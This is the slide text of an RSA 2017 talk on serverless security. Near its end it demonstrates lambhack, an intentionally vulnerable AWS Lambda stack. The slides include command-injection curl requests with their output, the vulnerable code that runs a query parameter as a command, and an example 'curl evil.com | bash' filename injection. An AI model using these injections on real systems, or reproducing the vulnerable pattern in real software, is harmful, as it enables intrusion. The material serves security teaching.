Serverless Security: Are you ready for the Future?
•
12 likes•25,778 views
Talk from RSA 2017 on Serverless Security and the 4 areas of growth for security in the world of serverless. In this talk, there is also the first release of lambhack, an open source, vulnerable lambda-based serverless stack demoing arbitrary code execution in lambda.
Recommended
Recommended
More Related Content
What's hot
What's hot (20)
Similar to Serverless Security: Are you ready for the Future?
Similar to Serverless Security: Are you ready for the Future? (20)
More from James Wickett
More from James Wickett (20)
Recently uploaded
Recently uploaded (20)
Serverless Security: Are you ready for the Future?
- 1. SESSION ID:SESSION ID: #RSAC James Wickett Serverless Security: Are you ready for the Future? ASD-F01 Head of Research Signal Sciences @wickett
- 2. #RSAC James Wickett 2 Head of Research at Signal Sciences Author DevOps Fundamentals at lynda.com Author of book on DevOps (email me for a free copy > james@signalsciences.com) Blogger at theagileadmin.com and labs.signalsciences.com
- 3. #RSAC Conclusion 3 Serverless encourages functions as deploy units, coupled with third party services that allow running end-to-end applications without worrying about system operation. New serverless patterns are just emerging Security with serverless is easier Security with serverless is harder
- 4. #RSAC Conclusion (2) 4 Four key areas apply to serverless security Software Supply Chain Security Delivery Pipeline Security Data Flow Security Attack Detection New! A very vulnerable lambda stack open source project github.com/wickett/lambhack
- 9. #RSAC Serverless == Backend as a Service
- 10. #RSAC serverless == Platform as a Service
- 12. #RSAC So, what is Serverless?
- 15. #RSAC Serverless was first used to describe applications that significantly or fully depend on 3rd party applications / services (‘in the cloud’) to manage server-side logic and state. http://martinfowler.com/articles/serverless.html
- 16. #RSAC Serverless can also mean applications where some amount of server-side logic is still written by the application developer but unlike traditional architectures is run in stateless compute containers that are event-triggered, ephemeral (may only last for one invocation), and fully managed by a 3rd party. http://martinfowler.com/articles/serverless.html
- 17. #RSAC History of Serverless 17 2012 - used to describe BaaS and Continuous Integration services run by third parties Late 2014 - AWS launched Lambda July 2015 - AWS launched API Gateway October 2015 - AWS re:Invent - The Serverless company using AWS Lambda 2015 to present - Frameworks forming 2016 - Serverless Conference http://www.slideshare.net/AmazonWebServices/arc308- the-serverless-company-using-aws-lambda
- 19. #RSAC Serverless Arch 19 Client Auth Service API Gateway Database Service Function A Function B Web Delivery
- 20. #RSAC 20
- 21. #RSAC What can we say is serverless?
- 22. #RSAC Serverless is Functions As a Service (FaaS)
- 24. #RSAC Serverless is (no management of) Servers
- 26. #RSAC Serverless is an opinionated framework for compute
- 27. #RSAC Serverless encourages functions as deploy units, coupled with third party services that allow running end-to-end applications without worrying about system operation.
- 28. #RSAC A Short History of Cloud 28
- 31. #RSAC DEVOPS
- 34. #RSAC Then, along came containers
- 35. #RSAC containers are teh hawtness
- 36. #RSAC
- 37. #RSAC Lots of effort in Container Orchestration
- 38. #RSAC The Cloud was to Virtualization as Serverless will be to Containers
- 39. #RSAC If you want to lead your company bravely into the new world, you would do well to focus lot on how serverless will evolve. - @Cloudopinion https://medium.com/@cloud_opinion/the-pattern-may-repeat-26de1e8b489d
- 40. #RSAC Serverless encourages functions as deploy units, coupled with third party services that allow running end-to-end applications without worrying about system operation.
- 41. #RSAC So, what are the upsides?
- 43. #RSAC Pay for what you use in 100MS increments
- 44. #RSAC With Serverless system administration is (mostly) lower
- 46. #RSAC Short Circuits Ops and moves infrastructure runtime closer to devs
- 47. #RSAC You can skip Chefing Dockering all the things!
- 50. #RSAC Great, what’s the catch?
- 51. #RSAC Ops Burden to rationalize Serverless model (specifically Deploy)
- 52. #RSAC Monitoring
- 53. #RSAC Logging
- 54. #RSAC Stateless for Real with no persistence* across function runs
- 56. #RSAC Security
- 58. #RSAC
- 62. #RSAC Run a web application
- 64. #RSAC CI/CD
- 65. #RSAC Security is the same and different
- 66. #RSAC What used to be system calls is now distributed computing over the network
- 67. #RSAC Serverless shifts attack surface to third parties
- 68. #RSAC Lets try a sample application in AWS
- 69. #RSAC Go Sparta 69 Golang! AWS Lambda supports bring your own binary Sparta wraps your binary with node.js shim
- 70. #RSAC
- 72. #RSAC Wordy 72 Analyzes textual occurrences given a block of text, returns JSON count of words Calls API under the hood to get text It is comprised of Lambda, s3, API Gateway
- 73. #RSAC
- 74. #RSAC
- 75. #RSAC
- 76. #RSAC go run main.go provision -s S3_BUCKET
- 77. #RSAC
- 78. #RSAC
- 79. #RSAC
- 80. #RSAC
- 81. #RSAC
- 82. #RSAC
- 83. #RSAC
- 84. #RSAC
- 85. #RSAC
- 86. #RSAC What I learned about serverless security
- 87. #RSAC
- 88. #RSAC Security
- 89. #RSAC Four areas of Serverless Security 89 Secure Software Supply Chain Delivery Pipeline Data Flow Security Attack Detection
- 93. #RSAC SSL / TLS from the Provider
- 95. #RSAC Routing from the provider
- 97. #RSAC
- 98. #RSAC Lambda + s3 + kinesis + DynamoDB + cloudformation + API Gateway + Auth0
- 99. #RSAC Abuse of open IAM privs 99 https://media.ccc.de/v/33c3-7865-gone_in_60_milliseconds
- 100. #RSAC Recommendation: Use a third-party service to monitor for provider config changes
- 101. #RSAC Provider Security 101 Disable root access keys Manage users with profiles Secure your keys in your deploy system Secure keys in dev system Use provider MFA
- 103. #RSAC
- 104. #RSAC Unit Testing
- 105. #RSAC Easier to mock Harder to mock
- 106. #RSAC
- 108. #RSAC Configuration is part of delivery
- 109. #RSAC
- 110. #RSAC Simple Deploy Pipeline Security 110 Only dev keys can push to ‘dev’ Only build/deploy system can push to pre-prod Integration tests must pass in this env Security validation must take place Allow push to prod, only by deploy system
- 111. #RSAC Security Integration Testing 111 BDD-Security - github.com/continuumsecurity/bdd- security Gauntlt - gauntlt.org
- 113. #RSAC Data Flow Security 113 Development Data Flow Diagrams Threat modeling Runtime
- 114. #RSAC Your provider is responsible for the underlying infrastructure and services. You are responsible for ensuring you use the services in a secure manner. https://read.acloud.guru/adopting-serverless-architectures-and-security-254a0c12b54a
- 119. #RSAC AppSec Greatest Hits (XSS, SQLi, Cmdexe) still relevant 15 years later!
- 121. #RSAC Types of Attacks 121 XSS, Injection, Deserialization, … New surface area similar problems e.g. appending to ‘curl evil.com | bash’ or <script>alert(1)</script> to a filename you upload on s3
- 122. #RSAC Defense 122 Logging, emitting events Vandium (SQLi) wrapper Content Security Policy (CSP) More things need to be done here…
- 123. #RSAC New Thing Alert! 123 Want to see make the point that appsec is still relevant in serverless A vulnerable Lambda + API Gateway stack (born from the heritage of WebGoat, Rails Goat and Gruyere, …) Introducing lambhack
- 124. #RSAC
- 125. #RSAC lambhack 125 A Vulnerable Lambda + API Gateway stack Open Source, MIT licensed Released for the first time here at RSA Includes arbitrary code execution in a query string More work needed, PRs accepted and looking for community help github.com/wickett/lambhack
- 126. #RSAC //command := lambdaEvent.PathParams["command"] command := lambdaEvent.QueryParams["args"] output := runner.Run(command) Vulnerable code is also vulnerable in Serverless
- 127. #RSAC Let’s take a look at cmdexe in lambhack
- 128. #RSAC $ curl "https://XXXX.execute-api.us-east-1.amazonaws.com/prod/ serverless-audit/c?args=uname+-a;+sleep+1" > Linux ip-10-36-34-119 4.4.35-33.55.amzn1.x86_64 #1 SMP Tue Dec 6 20:30:04 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux uname -a
- 129. #RSAC $ curl “https://XXXX.execute-api.us-east-1.amazonaws.com/prod/ serverless-audit/c?args=cat+/proc/version;+sleep+1" > Linux version 4.4.35-33.55.amzn1.x86_64 (mockbuild@gobi- build-60006) (gcc version 4.8.3 20140911 (Red Hat 4.8.3-9) (GCC) ) SMP Tue Dec 6 20:30:04 UTC 2016 cat /proc/version
- 130. #RSAC $ curl "https://XXXX.execute-api.us-east-1.amazonaws.com/prod/ serverless-audit/c?args=ls+-la+/tmp;+sleep+1" total 17916 drwx------ 2 sbx_user1056 490 4096 Feb 8 22:02 . drwxr-xr-x 21 root root 4096 Feb 8 21:47 .. -rwxrwxr-x 1 sbx_user1056 490 18334049 Feb 8 22:02 Sparta.lambda.amd64 Let’s see /tmp
- 131. #RSAC $ curl “https://XXXX.execute-api.us-east-1.amazonaws.com/prod/ serverless-audit/c?args=ls+/tmp;+sleep+1" $ curl “https://XXXX.execute-api.us-east-1.amazonaws.com/ pargs=touch+/tmp/wickettfile;+sleep+1" $ curl “https://XXXX.execute-api.us-east-1.amazonaws.com/prod/ serverless-audit/args=ls+/tmp;+sleep+1" > Sparta.lambda.amd64 wickettfile Lambda Reuse!
- 132. #RSAC $ curl "https://XXXX.execute-api.us-east-1.amazonaws.com/prod/ serverless-audit/c?args=which+curl;+sleep+1" > /usr/bin/curl Could we upload our own payload?
- 133. #RSAC XSS, SQLi, … More to come!
- 134. #RSAC email me if you are interested: james@signalsciences.com
- 135. #RSAC Conclusion 135 Serverless encourages functions as deploy units, coupled with third party services that allow running end-to-end applications without worrying about system operation. New serverless patterns are just emerging Security with serverless is easier Security with serverless is harder
- 136. #RSAC Conclusion (2) 136 Four key areas apply to serverless security Software Supply Chain Security Delivery Pipeline Security Data Flow Security Attack Detection New! A very vulnerable lambda stack open source project github.com/wickett/lambhack
- 137. #RSAC